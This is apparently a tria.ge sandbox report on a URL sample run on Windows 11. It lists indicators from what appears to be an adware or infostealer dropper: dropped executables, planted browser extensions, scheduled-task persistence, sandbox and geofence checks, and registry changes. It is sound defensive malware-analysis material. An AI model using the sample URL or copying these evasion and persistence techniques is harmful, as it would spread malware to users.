Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
299s -
max time network
296s -
platform
windows11-21h2_x64 -
resource
win11-20240709-en -
resource tags
arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system -
submitted
14/07/2024, 19:00
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ify.ac/1Ic5
Resource
win11-20240709-en
Behavioral task
behavioral2
Sample
https://ify.ac/1Ic5
Resource
win10-20240611-en
Behavioral task
behavioral3
Sample
https://ify.ac/1Ic5
Resource
win10v2004-20240709-en
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 109 5876 rundll32.exe -
pid Process 5140 powershell.exe 4768 powershell.exe 792 powershell.exe 4524 powershell.EXE 4544 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion SDWk4rSnDwIEsW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3171217504-1685128607-2237314850-1000\Control Panel\International\Geo\Nation DlrnvPY.exe -
Executes dropped EXE 14 IoCs
pid Process 5284 setup_ZbRJIaBi46.tmp 1928 cd2mp3converter32_64.exe 1180 zxkZvB0X70uuGxQ3YH.exe 1924 setup.exe 5852 setup.exe 2192 setup.exe 2228 setup.exe 3152 setup.exe 2568 SDWk4rSnDwIEsW.exe 472 Assistant_111.0.5168.25_Setup.exe_sfx.exe 2940 assistant_installer.exe 5532 assistant_installer.exe 1720 SDWk4rSnDwIEsW.exe 5200 DlrnvPY.exe -
Loads dropped DLL 11 IoCs
pid Process 5284 setup_ZbRJIaBi46.tmp 1924 setup.exe 5852 setup.exe 2192 setup.exe 2228 setup.exe 3152 setup.exe 2940 assistant_installer.exe 2940 assistant_installer.exe 5532 assistant_installer.exe 5532 assistant_installer.exe 5876 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json DlrnvPY.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json DlrnvPY.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini DlrnvPY.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe File opened (read-only) \??\F: setup.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content DlrnvPY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 DlrnvPY.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DlrnvPY.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DlrnvPY.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 DlrnvPY.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol SDWk4rSnDwIEsW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 DlrnvPY.exe File created C:\Windows\system32\GroupPolicy\gpt.ini SDWk4rSnDwIEsW.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DlrnvPY.exe File created C:\Program Files (x86)\UQtSSXvqU\qAmzzaV.xml DlrnvPY.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\PLqbNoe.dll DlrnvPY.exe File created C:\Program Files (x86)\ezMWJXFFLyUn\bjgALJF.dll DlrnvPY.exe File created C:\Program Files (x86)\UQtSSXvqU\RGDzRw.dll DlrnvPY.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi DlrnvPY.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlrnvPY.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\aRsGgDBzvRlwz.dll DlrnvPY.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\PFUpSQi.xml DlrnvPY.exe File created C:\Program Files (x86)\hMiQKFvmPLjeC\HnXYHKd.xml DlrnvPY.exe File created C:\Program Files (x86)\OJBbginKvssDnbEKbsR\mbXMUUu.dll DlrnvPY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi DlrnvPY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DlrnvPY.exe File created C:\Program Files (x86)\AMqhlrBDqRJU2\UniKJqx.xml DlrnvPY.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job schtasks.exe File created C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job schtasks.exe File created C:\Windows\Tasks\OcPshDNvhDnVmSv.job schtasks.exe File created C:\Windows\Tasks\MRTHivZIQsRdEanwm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 56 IoCs
pid pid_target Process procid_target 5616 1928 WerFault.exe 113 2120 1928 WerFault.exe 113 2824 1928 WerFault.exe 113 4188 1928 WerFault.exe 113 5524 1928 WerFault.exe 113 5104 1928 WerFault.exe 113 2068 1928 WerFault.exe 113 4576 1928 WerFault.exe 113 1176 1928 WerFault.exe 113 5848 1928 WerFault.exe 113 4896 1928 WerFault.exe 113 2708 1928 WerFault.exe 113 1132 1928 WerFault.exe 113 1912 1928 WerFault.exe 113 4920 1928 WerFault.exe 113 5884 1928 WerFault.exe 113 1916 1928 WerFault.exe 113 4932 1928 WerFault.exe 113 3576 1928 WerFault.exe 113 3028 1928 WerFault.exe 113 4448 1928 WerFault.exe 113 2748 1928 WerFault.exe 113 4860 1928 WerFault.exe 113 6100 1928 WerFault.exe 113 5860 1928 WerFault.exe 113 452 1928 WerFault.exe 113 5240 1928 WerFault.exe 113 4796 1928 WerFault.exe 113 3496 1928 WerFault.exe 113 4604 1928 WerFault.exe 113 5864 1928 WerFault.exe 113 5684 1928 WerFault.exe 113 5048 1928 WerFault.exe 113 804 1928 WerFault.exe 113 644 1928 WerFault.exe 113 1312 1928 WerFault.exe 113 4868 1928 WerFault.exe 113 5828 1928 WerFault.exe 113 2264 1928 WerFault.exe 113 3140 1928 WerFault.exe 113 1948 1928 WerFault.exe 113 4056 1928 WerFault.exe 113 5156 1928 WerFault.exe 113 5856 1928 WerFault.exe 113 2572 1928 WerFault.exe 113 3660 1928 WerFault.exe 113 4008 1928 WerFault.exe 113 3556 1928 WerFault.exe 113 1088 1928 WerFault.exe 113 4140 1928 WerFault.exe 113 5696 1720 WerFault.exe 246 5932 1928 WerFault.exe 113 4824 1928 WerFault.exe 113 5060 1928 WerFault.exe 113 3192 2568 WerFault.exe 228 4056 5200 WerFault.exe 319 -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SDWk4rSnDwIEsW.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName SDWk4rSnDwIEsW.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume DlrnvPY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" DlrnvPY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" SDWk4rSnDwIEsW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ DlrnvPY.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" DlrnvPY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" DlrnvPY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" DlrnvPY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" DlrnvPY.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3171217504-1685128607-2237314850-1000_Classes\Local Settings msedge.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e setup.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\setup_ZbRJIaBi46.zip:Zone.Identifier msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
